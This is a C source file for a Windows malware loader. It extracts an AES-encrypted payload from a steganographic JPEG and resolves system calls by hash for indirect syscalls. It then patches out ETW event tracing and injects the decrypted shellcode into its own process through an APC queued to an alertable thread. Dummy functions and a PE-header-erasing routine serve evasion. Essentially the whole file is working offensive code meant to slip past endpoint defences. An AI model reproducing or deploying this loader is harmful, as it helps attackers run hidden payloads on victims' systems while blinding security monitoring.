#include <Windows.h>
#include <stdint.h>
#include <stdio.h>
#include "HellsHall.h"
#include "aes.h"
#include "helperfunc.h"

// #define DEBUG 
// #define BASIC_INJECTION
#define APC_INJECTION


// generated by 'Hasher' Rs
#define NtAllocateVirtualMemory_rs		0x898AD7C7
#define NtCreateProcessEx_rs			0x437D3FCA
#define NtWriteVirtualMemory_rs			0xDEF572D9
#define NtWaitForSingleObject_rs		0x2E5E83CF
#define NtRemoveProcessDebug_rs			0x2A2ACAD2
#define NtQueueApcThreadEx_rs			0x441C1164
#define NtProtectVirtualMemory_rs		0xD8D55D43
#define NtCreateThreadEx_rs				0x979AE967
#define EtwEventWrite_rs 			    0xC75F0951 
#define NtTraceEvent_rs					0x5351B8C7 
#define NtReadVirtualMemory_rs			0xF44B918A
#define PAYLOAD							L"meme_final_stego.jpg"	
#define BLOCK_SIZE 8
#define KEY_SIZE   16

// a structure to keep the used sycalls
typedef struct _NTAPI_FUNC
{
	NT_SYSCALL	NtAllocateVirtualMemory;
	NT_SYSCALL	NtProtectVirtualMemory;
	NT_SYSCALL	NtCreateThreadEx;
	NT_SYSCALL	NtWaitForSingleObject;
	NT_SYSCALL	NtWriteVirtualMemory;
	NT_SYSCALL	NtCreateProcessEx;
	NT_SYSCALL	NtRemoveProcessDebug;
	NT_SYSCALL	NtQueueApcThreadEx;
	NT_SYSCALL	NtReadVirtualMemory;

}NTAPI_FUNC, * PNTAPI_FUNC;


NTAPI_FUNC g_Nt = { 0 };


int DummyFunction() {

	// dummy code
	int		j = rand();
	int		i = j + rand();
	return i;
}


VOID AlertableFunction5() {

	HANDLE hEvent1 = CreateEvent(NULL, NULL, NULL, NULL);
	HANDLE hEvent2 = CreateEvent(NULL, NULL, NULL, NULL);

	if (hEvent1 && hEvent2) {
		SignalObjectAndWait(hEvent1, hEvent2, INFINITE, TRUE);
		CloseHandle(hEvent1);
		CloseHandle(hEvent2);
	}
}


BOOL InitializeNtSyscalls() {

	if (!FetchNtSyscall(NtAllocateVirtualMemory_rs, &g_Nt.NtAllocateVirtualMemory)) {
#ifdef DEBUG
		printf("[!] Failed In Obtaining The Syscall Number Of NtAllocateVirtualMemory \n");
#endif // DEBUG

		return FALSE;
	}
#ifdef DEBUG
	printf("[+] Syscall Number Of NtAllocateVirtualMemory Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", g_Nt.NtAllocateVirtualMemory.dwSSn, g_Nt.NtAllocateVirtualMemory.pSyscallInstAddress);
#endif

	if (!FetchNtSyscall(NtProtectVirtualMemory_rs, &g_Nt.NtProtectVirtualMemory)) {
#ifdef DEBUG
		printf("[!] Failed In Obtaining The Syscall Number Of NtProtectVirtualMemory \n");
#endif // DEBUG
		return FALSE;
	}
#ifdef DEBUG
	printf("[+] Syscall Number Of NtProtectVirtualMemory Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", g_Nt.NtProtectVirtualMemory.dwSSn, g_Nt.NtProtectVirtualMemory.pSyscallInstAddress);
#endif

	if (!FetchNtSyscall(NtCreateThreadEx_rs, &g_Nt.NtCreateThreadEx)) {
#ifdef DEBUG
		printf("[!] Failed In Obtaining The Syscall Number Of NtCreateThreadEx \n");
#endif // DEBUG
		return FALSE;
	}
#ifdef DEBUG
	printf("[+] Syscall Number Of NtCreateThreadEx Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", g_Nt.NtCreateThreadEx.dwSSn, g_Nt.NtCreateThreadEx.pSyscallInstAddress);
#endif

	if (!FetchNtSyscall(NtWaitForSingleObject_rs, &g_Nt.NtWaitForSingleObject)) {
#ifdef DEBUG
		printf("[!] Failed In Obtaining The Syscall Number Of NtWaitForSingleObject \n");
#endif // DEBUG
		return FALSE;
	}
#ifdef DEBUG
	printf("[+] Syscall Number Of NtWaitForSingleObject Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", g_Nt.NtWaitForSingleObject.dwSSn, g_Nt.NtWaitForSingleObject.pSyscallInstAddress);
#endif // DEBUG
	if (!FetchNtSyscall(NtWriteVirtualMemory_rs, &g_Nt.NtWriteVirtualMemory)) {
#ifdef DEBUG
		printf("[!] Failed In Obtaining The Syscall Number Of NtWriteVirtualMemory \n");
#endif // DEBUG
		return FALSE;
	}
#ifdef DEBUG
	printf("[+] Syscall Number Of NtWriteVirtualMemory Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", g_Nt.NtWriteVirtualMemory.dwSSn, g_Nt.NtWriteVirtualMemory.pSyscallInstAddress);
#endif // DEBUG
	if (!FetchNtSyscall(NtCreateProcessEx_rs, &g_Nt.NtCreateProcessEx)) {
#ifdef DEBUG
		printf("[!] Failed In Obtaining The Syscall Number Of NtCreateProcessEx \n");
#endif // DEBUG
		return FALSE;
	}
#ifdef DEBUG
	printf("[+] Syscall Number Of NtCreateProcessEx Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", g_Nt.NtCreateProcessEx.dwSSn, g_Nt.NtCreateProcessEx.pSyscallInstAddress);
#endif

	if (!FetchNtSyscall(NtRemoveProcessDebug_rs, &g_Nt.NtRemoveProcessDebug)) {
#ifdef DEBUG
		printf("[!] Failed In Obtaining The Syscall Number Of NtRemoveProcessDebug \n");
#endif // DEBUG
		return FALSE;
	}
#ifdef DEBUG
	printf("[+] Syscall Number Of NtRemoveProcessDebug Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", g_Nt.NtRemoveProcessDebug.dwSSn, g_Nt.NtRemoveProcessDebug.pSyscallInstAddress);
#endif

	if (!FetchNtSyscall(NtQueueApcThreadEx_rs, &g_Nt.NtQueueApcThreadEx)) {
#ifdef DEBUG
		printf("[!] Failed In Obtaining The Syscall Number Of NtQueueApcThreadEx \n");
#endif
		return FALSE;
	}
#ifdef DEBUG
	printf("[+] Syscall Number Of NtQueueApcThreadEx Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", g_Nt.NtQueueApcThreadEx.dwSSn, g_Nt.NtQueueApcThreadEx.pSyscallInstAddress);
#endif

	if (!FetchNtSyscall(NtReadVirtualMemory_rs, &g_Nt.NtReadVirtualMemory)) {
#ifdef DEBUG
		printf("[!] Failed In Obtaining The Syscall Number Of NtReadVirtualMemory \n");
#endif
		return FALSE;
	}
#ifdef DEBUG
	printf("[+] Syscall Number Of NtReadVirtualMemory Is : 0x%0.2X \n\t\t>> Executing 'syscall' instruction Of Address : 0x%p\n", g_Nt.NtReadVirtualMemory.dwSSn, g_Nt.NtReadVirtualMemory.pSyscallInstAddress);
#endif

	return TRUE;
}


BOOL EtwPatch(HANDLE hProcess) {
	NTSTATUS STATUS = 0;
	LPVOID pEtwEventWrite = FindETWbyHash(NtTraceEvent_rs);
	if (!pEtwEventWrite) {
#ifdef DEBUG
		printf("[!] Failed to get EtwEventWrite\n");
#endif
		return FALSE;
	}

	char patch[] = { 0x90, 0xC3, 0x90, 0x90, 0x90, 0x90 }; 
	SIZE_T patchSize = sizeof(patch);

	// Change protection
	ULONG oldProtect = 0;
	SET_SYSCALL(g_Nt.NtProtectVirtualMemory);
	PVOID base = pEtwEventWrite;
	SIZE_T regionSize = patchSize;
	STATUS = RunSyscall(hProcess, &base, &regionSize, PAGE_EXECUTE_READWRITE, &oldProtect);
	if (STATUS != 0) {
#ifdef DEBUG
		printf("[!] NtProtectVirtualMemory Failed With STATUS : 0x%0.8X\n", STATUS);
#endif
		return -1;
	}

	// Write patch
	SET_SYSCALL(g_Nt.NtWriteVirtualMemory);
	STATUS = RunSyscall(hProcess, pEtwEventWrite, patch, patchSize, NULL);
	if (STATUS != 0) {
#ifdef DEBUG
		printf("[!] NtWriteVirtualMemory Failed With STATUS : 0x%0.8X\n", STATUS);
#endif
		return -1;
	}

	// Restore protection
	SET_SYSCALL(g_Nt.NtProtectVirtualMemory);
	STATUS = RunSyscall(hProcess, &base, &regionSize, oldProtect, &oldProtect);

	return (STATUS == 0);
}


PVOID g_pFinalAddress = NULL;
#define STABLE_CODE
// Create APC to run the payload once the thread enters an alertable state
BOOL LocalApcInjection(HANDLE hThread, PBYTE pPayload, size_t sPayloadSize) {

	NTSTATUS	STATUS = 0;
	PVOID		pAddress = NULL;
	DWORD		dwOldProtection = NULL;
	HANDLE		hProcess = (HANDLE)-1; // local process

	printf("HelloWorld");

#ifdef STABLE_CODE
	SET_SYSCALL(g_Nt.NtAllocateVirtualMemory);
	if ((STATUS = RunSyscall(hProcess, &pAddress, 0, &sPayloadSize, MEM_COMMIT |	MEM_RESERVE, PAGE_READWRITE)) != 0x00 || pAddress == NULL) {
#ifdef DEBUG
		printf("[!] NtAllocateVirtualMemory Failed With Error: 0x%0.8X \n", STATUS);
#endif 
		return -1;
	}

#ifdef DEBUG
	printf("[+] DONE \n");
#endif 

	SET_SYSCALL(g_Nt.NtWriteVirtualMemory);
	if ((STATUS = RunSyscall(hProcess, pAddress, pPayload, sPayloadSize, NULL)) != 0x00) {
#ifdef DEBUG
		printf("[!] NtWriteVirtualMemory Failed With Error: 0x%0.8X \n", STATUS);
#endif
		return -1;
	}
	free(pPayload);

#ifdef DEBUG
	printf("[i] Calling NtProtectVirtualMemory ... \n");
	// changing memory protection
#endif

	SET_SYSCALL(g_Nt.NtProtectVirtualMemory);
	if ((STATUS = RunSyscall(hProcess, &pAddress, &sPayloadSize, PAGE_EXECUTE_READ, &dwOldProtection)) != 0x00) {
#ifdef DEBUG
		printf("[!] NtProtectVirtualMemory Failed With STATUS : 0x%0.8X\n", STATUS);
#endif
		return -1;
	}

#ifdef DEBUG
	printf("[+] DONE \n");
	printf("[+] Final Payload Written At Address 0x%p \n", pAddress);
	printf("[#] Press <Enter> To Continue ... ");
	getchar();
#endif
	SET_SYSCALL(g_Nt.NtQueueApcThreadEx);
	if ((STATUS = RunSyscall(hThread, NULL, pAddress, NULL, NULL)) != 0x00) {
#ifdef DEBUG
		printf("[!] NtQueueApcThreadEx Failed With STATUS : 0x%0.8X\n", STATUS);
#endif
		return -1;
	}

#endif STABLE_CODE
	// Make global variables to avoid optimization removal 
	g_pFinalAddress = pAddress;


	return 0; // not implemented
}


// Remove the PE header from the allocated memory
BOOL RemovePEHeader(HANDLE hProcess, PVOID pBaseAddress) {
	NTSTATUS STATUS = 0;
	IMAGE_DOS_HEADER dosHeader = { 0 };
	SIZE_T bytesRead = 0;
	ULONG oldProtect = 0;

	// 1. DOS header
	SET_SYSCALL(g_Nt.NtReadVirtualMemory);
	STATUS = RunSyscall(hProcess, pBaseAddress, &dosHeader, sizeof(IMAGE_DOS_HEADER), &bytesRead);
	if (STATUS != 0x00 || bytesRead != sizeof(IMAGE_DOS_HEADER)) {
		printf("[!] NtReadVirtualMemory failed: 0x%0.8X\n", STATUS);
		return -1;
	}
	if (dosHeader.e_magic != IMAGE_DOS_SIGNATURE) {
		printf("[!] Invalid DOS signature\n");
		return -1;
	}

	// 2. NT header
	IMAGE_NT_HEADERS ntHeaders = { 0 };
	SET_SYSCALL(g_Nt.NtReadVirtualMemory);
	STATUS = RunSyscall(
		hProcess,
		(PBYTE)pBaseAddress + dosHeader.e_lfanew,
		&ntHeaders,
		sizeof(IMAGE_NT_HEADERS),
		&bytesRead
	);
	if (STATUS != 0x00 || bytesRead != sizeof(IMAGE_NT_HEADERS)) {
		printf("[!] NtReadVirtualMemory failed: 0x%0.8X\n", STATUS);
		return -1;
	}
	if (ntHeaders.Signature != IMAGE_NT_SIGNATURE) {
		printf("[!] Invalid NT signature\n");
		return -1;
	}

	SIZE_T headerSize = ntHeaders.OptionalHeader.SizeOfHeaders;

	// 3. Make headers writable
	PVOID base = pBaseAddress;
	SIZE_T regionSize = headerSize;
	SET_SYSCALL(g_Nt.NtProtectVirtualMemory);
	STATUS = RunSyscall(hProcess, &base, &regionSize, PAGE_READWRITE, &oldProtect);
	if (STATUS != 0x00) {
		printf("[!] NtProtectVirtualMemory failed: 0x%0.8X\n", STATUS);
		return -1;
	}

	// 4. Zero headers
	BYTE* zeroBuffer = (BYTE*)calloc(1, headerSize);
	if (!zeroBuffer) return -1;
	SET_SYSCALL(g_Nt.NtWriteVirtualMemory);
	STATUS = RunSyscall(hProcess, pBaseAddress, zeroBuffer, headerSize, NULL);
	free(zeroBuffer);
	if (STATUS != 0x00) {
		printf("[!] NtWriteVirtualMemory failed: 0x%0.8X\n", STATUS);
		return -1;
	}

	// 5. Restore protection
	SET_SYSCALL(g_Nt.NtProtectVirtualMemory);
	STATUS = RunSyscall(hProcess, &base, &regionSize, oldProtect, &oldProtect);
	if (STATUS != 0x00) {
		printf("[!] NtProtectVirtualMemory restore failed: 0x%0.8X\n", STATUS);
		return -1;
	}

	printf("[+] PE Header Removed Successfully\n");
	return 0;
}


// Settimer to switch memory pages permission 
BOOL PEStealth() {
	return 0; // not implemented
}


// Expand environment variables in the given path
wchar_t* ExpandPath(const wchar_t* path) {
	static wchar_t expanded[MAX_PATH];

	if (ExpandEnvironmentStringsW(path, expanded, MAX_PATH) == 0) {
		wprintf(L"[!] Failed to expand path: %ls\n", path);
		return NULL;
	}
	return expanded;
}


// Main function
int WinMain() {

	NTSTATUS	STATUS		= NULL;
	PVOID		pAddress	= NULL;
	DWORD		dwOld		= NULL;
	size_t		payload_size = 0;	
	HANDLE		hProcess	= (HANDLE)-1,	// local process
				hThread		= NULL;

#ifdef DEBUG
	printf("[#] Press <Enter> To Start decrypt payload... ");
	getchar();
#endif

	wchar_t* expandedPath = ExpandPath(PAYLOAD);
	if (!expandedPath) {
		int i = DummyFunction();
		return -1;
	}

	// Convert wide string -> UTF-8 (or ANSI) before passing to Decrypt()
	char utf8Path[MAX_PATH];
	size_t converted = 0;
	wcstombs_s(&converted, utf8Path, MAX_PATH, expandedPath, _TRUNCATE);

	unsigned char* Decrypted = Decrypt(utf8Path, &payload_size);
	if (!Decrypted) {
#ifdef DEBUG
		
		printf("[!] Failed To Decrypt The Payload \n");
#endif
		return -1;
	}

#ifdef DEBUG
	printf("[!] Decrypt successfully!\n\t\t");
	//PrintHexBuffer(Decrypted, sSize);
	printf("[#] Press <Enter> To Continue ... ");
	getchar();
#endif

	// initializing the used syscalls
	if (!InitializeNtSyscalls()) {
#ifdef DEBUG
		printf("[!] Failed To Initialize The Specified Indirect-Syscalls \n");
#endif
		int i = DummyFunction();
		return -1;
	}
#ifdef DEBUG
	printf("[#] Press <Enter> To Continue ... ");
	getchar();

	printf("[i] Calling NtAllocateVirtualMemory ... ");
#endif

	// ETW patching ETWEventWrite
	if (!EtwPatch(hProcess)) {
#ifdef DEBUG
		printf("[!] Failed To Patch EtwEventWrite \n");
#endif
		return -1;
	}


#ifdef APC_INJECTION
	SET_SYSCALL(g_Nt.NtCreateThreadEx);
	if ((STATUS = RunSyscall(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)AlertableFunction5, NULL, FALSE, NULL, NULL, NULL, NULL)) != 0x00) {
#ifdef DEBUG
		printf("[!] NtCreateThreadEx Failed With STATUS : 0x%0.8X\n", STATUS);
#endif 
		return -1;
	}

#ifdef DEBUG
	printf("[+] Thread %d Created Of Entry: 0x%p \n", GetThreadId(hThread), (LPTHREAD_START_ROUTINE)AlertableFunction5);
	printf("[#] Press <Enter> To Continue ... ");
	getchar();

#endif 


	if (LocalApcInjection(hThread, Decrypted, payload_size) != 0) {
#ifdef DEBUG
		printf("[!] Failed In LocalApcInjection \n");
#endif 
		return -1;
	}
	int k = DummyFunction();

	// Remove PE header for stealth
	/*if (RemovePEHeader(hProcess, g_pFinalAddress) != 0) {
#ifdef DEBUG
		printf("[!] Failed To Remove PE Header \n");
#endif
		return -1;
	}*/

	//--------------------------------------------------------------------
	SET_SYSCALL(g_Nt.NtWaitForSingleObject);
	if ((STATUS = RunSyscall(hThread, FALSE, NULL)) != 0x00) {
#ifdef DEBUG
		printf("[!] NtWaitForSingleObject Failed With Error: 0x%0.8X \n", STATUS);
#endif
		return -1;
	}

#endif // APC_INJECTION


#ifdef BASIC_INJECTION
	// allocating memory
	SET_SYSCALL(g_Nt.NtAllocateVirtualMemory);
	if ((STATUS = RunSyscall(hProcess, &pAddress, 0, &payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)) != 0x00 || pAddress == NULL) {
#ifdef DEBUG
		printf("[!] NtAllocateVirtualMemory Failed With Error: 0x%0.8X \n", STATUS);
#endif 
		return -1;
	}
#ifdef DEBUG
	printf("[+] DONE \n");
#endif

#ifdef DEBUG
	// copying the payload
	printf("[+] Allocated Memory At Address 0x%p \n", pAddress);
#endif



	SET_SYSCALL(g_Nt.NtWriteVirtualMemory);
	if ((STATUS = RunSyscall(hProcess, pAddress, Decrypted, payload_size, NULL)) != 0x00) {
#ifdef DEBUG
		printf("[!] NtWriteVirtualMemory Failed With Error: 0x%0.8X \n", STATUS);
#endif
		return -1;
	}
	free(Decrypted);

#ifdef DEBUG
	printf("[i] Calling NtProtectVirtualMemory ... ");
	// changing memory protection
#endif
	SET_SYSCALL(g_Nt.NtProtectVirtualMemory);
	if ((STATUS = RunSyscall(hProcess, &pAddress, &payload_size, PAGE_EXECUTE_READ, &dwOld)) != 0x00) {
#ifdef DEBUG
		printf("[!] NtProtectVirtualMemory Failed With STATUS : 0x%0.8X\n", STATUS);
#endif
		return -1;
	}
#ifdef DEBUG
	printf("[+] DONE \n");


	printf("[#] Press <Enter> To Execute The Payload ... ");
	getchar();

	printf("[i] Calling NtCreateThreadEx ... ");
#endif
	// executing the payload
	SET_SYSCALL(g_Nt.NtCreateThreadEx);
	if ((STATUS = RunSyscall(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, pAddress, NULL, FALSE, NULL, NULL, NULL, NULL)) != 0x00) {
#ifdef DEBUG
		printf("[!] NtCreateThreadEx Failed With STATUS : 0x%0.8X\n", STATUS);
#endif
		return -1;
	}

#ifdef DEBUG
	printf("[+] DONE \n");
	printf("[+] Thread %d Created Of Entry: 0x%p \n", GetThreadId(hThread), pAddress);


	printf("[i] Calling NtWaitForSingleObject ... ");

#endif
	// waiting for the payload
	SET_SYSCALL(g_Nt.NtWaitForSingleObject);
	if ((STATUS = RunSyscall(hThread, FALSE, NULL)) != 0x00) {
#ifdef DEBUG
		printf("[!] NtWaitForSingleObject Failed With Error: 0x%0.8X \n", STATUS);
#endif
		return -1;
	}
#ifdef DEBUG
	printf("[+] DONE \n");


	printf("[#] Press <Enter> To Quit ... ");
	getchar();
#endif
#endif // BASIC
	return 0;
}



